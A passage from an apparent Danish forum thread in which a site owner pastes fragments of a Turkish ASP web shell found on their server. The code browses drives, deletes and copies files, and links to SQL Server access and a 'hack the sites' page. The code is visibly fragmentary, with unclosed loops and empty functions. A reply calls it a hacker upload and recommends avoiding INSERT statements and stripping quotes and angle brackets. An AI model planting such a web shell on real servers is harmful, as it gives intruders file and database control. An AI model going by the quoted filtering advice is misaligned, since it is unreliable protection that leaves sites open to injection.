Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&PathFile="&Path&"/"&f1.Name&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font> <font face=wingdings size=4><a href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b><br>"
end sub

function createFileName()
fName_ = ""
for i=1 to 10
fName_ = fName_ & int(Rnd*100)
createFileName = fName_
end function

function resimYol(path_)
on error resume next
path_ = Replace(Replace(path_,"\","/"),"//","/")
lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\"))
if yaziyomu2(lpath_) then
fname__ = "0"&createFileName()&"."&Right(path_,3)
objFSO.CopyFile path_, lpath_&"\"&fname__
Response.Write("Resim Açýlamýyor.. <br>Ýsterseniz Download Ederek görüntüleyebilirsiniz..")
end if
resimYol = fname__
end function
if not popup then
Set fc = Nothing
Set objFSO = Nothing
end if

<script language=javascript>
var dosyaPath = "<%=dosyaPath%>"
function driveGo(drive_){
location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date();
Response.Write "<table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>Sürücüler</td></tr>"
for each drive_ in objFSO.Drives
Response.Write "<tr><td>"
Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
Response.Write "</a></td></tr>"
Response.Write "<tr><td>"
Response.write "<a href='"&dosyaPath&"?time="&time()&"'><font face=webdings>H</font> Local Path"
Response.Write "</a></td></tr>"
Response.Write "</table><br>"
Set fc = Nothing
Set objFSO = Nothing
<a href="<%=dosyaPath%>?status=13" onclick="sistemBilgisi(this.href);return false;">Sistem Bilgisi</a>
<a href="<%=dosyaPath%>?status=40" onclick="sistemTest(this.href);return false;">Sistemi Test Et</a>
<a href="<%=dosyaPath%>?status=50">Siteleri Hackle :D</a>
<a href="<%=dosyaPath%>?status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Klasor Islemleri</a>
<a href="<%=dosyaPath%>?status=15" onclick="sqlServer(this.href);return false;">SQL Server Islemleri</a>
<a href="<%=dosyaPath%>?status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
<script language=javascript>
function sistemBilgisi(yol){
function klasorIslemleri(yol){
function sqlServer(yol){
function poweredby(yol){
function sistemTest(yol){
Avatar billede sunezapa Nybegynder
04. marts 2006 - 21:08 #1
det er upload fra en hacker, og scriptet kan liste websitets tabeller, hvis hackeren kan gætte hvor de ligger henne...

Sandsynligvis uploadet via en eller anden form du har liggende, f.eks. en gæstebog, eller "send en besked"...

Anbefaling: gør din database sikker mod sådanne uploads,
f.eks. ved at undgå "INSERT INTO..." SQL-sætninger,
samt replace(inputText,"'","´") og replace(inputText,"<","") o.lign. - for at undgå at der indtastes kode via dine forms-felter.
Jeg har en SQLtxt=replace(replace(replace(txt,"'","´"),"<",""),">","") funktion,
og sætter så SQLtext(inputTxt) foran al text-indput i forms,
og har også set ovenstående kode - den kunne bare ikke noget, da alle "<>" var fjernet ;-)
Avatar billede Ny bruger Nybegynder

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